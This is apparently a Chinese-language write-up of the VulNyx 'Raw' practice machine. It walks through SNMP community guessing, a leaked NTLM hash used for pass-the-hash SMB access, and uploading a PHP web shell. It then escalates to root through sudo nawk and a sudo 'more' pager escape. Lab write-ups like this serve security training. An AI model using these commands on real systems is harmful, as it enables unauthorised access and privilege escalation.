首页 靶场练习 VulNyx Hard

# 靶场搭建

下载:Raw

Nat,IP: 92.168.1.176

# 渗透过程

# 信息初收集

PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http         Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Site doesn't have a title (text/html).
3000/tcp open  microsoft-ds
| fingerprint-strings: 
|   SMBProgNeg: 
|     SMBr
|_    "3DUfw
┌──(root㉿kali)-[~]
└─# nmap -sU 192.168.1.176 --top-ports 100   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 04:36 EDT
Nmap scan report for 192.168.1.176
Host is up (0.00062s latency).
Not shown: 98 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp
MAC Address: 00:0C:29:96:5D:D1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 121.25 seconds
┌──(root㉿kali)-[~]
└─# onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt 192.168.1.176
Scanning 1 hosts, 3219 communities
192.168.1.176 [wally] Linux raw 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64
┌──(root㉿kali)-[~]
└─# snmpwalk -v 2c -c wally 192.168.1.176
#省略
iso.3.6.1.2.1.25.4.2.1.5.532 = STRING: "/usr/local/bin/smbserver.py share /var/www/html/B@ckUpW@lly -username wally -hashes :3B4C57484504038C2F2E94861D507BA7 -smb2suppo"
#省略
看到了用户、哈希值、绝对路径和共享路径
# smbclient //192.168.1.176/share -U wally --pw-nt-hash '3B4C57484504038C2F2E94861D507BA7' -p 3000
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D     4096  Wed Nov 29 05:06:02 2023
  ..                                  D     4096  Wed Nov 29 05:46:54 2023
                148529400 blocks of size 1024. 14851044 blocks available
smb: \> put shell.php
putting file shell.php as \shell.php (487.7 kb/s) (average 487.7 kb/s)
smb: \>
监听访问:http://192.168.1.176/B@ckUpW@lly/shell.php
# 提权
sudo -u loko nawk 'BEGIN {system("/bin/sh")}'
sudo -l 发现可以 more 文件,more 在 sudo 下可以进入 bash。但是这个指定的文件太短了,因此需要设置 tty 的显示字符数量,强行进行分页,从而进入 bash
stty rows 6 columns 6
然后再 sudo sudo /usr/bin/more /root/Pwn3d
直接 !/bin/bash 进入 root 的 shell,再重新设置回原始大小: stty rows 28 columns 213
OK 了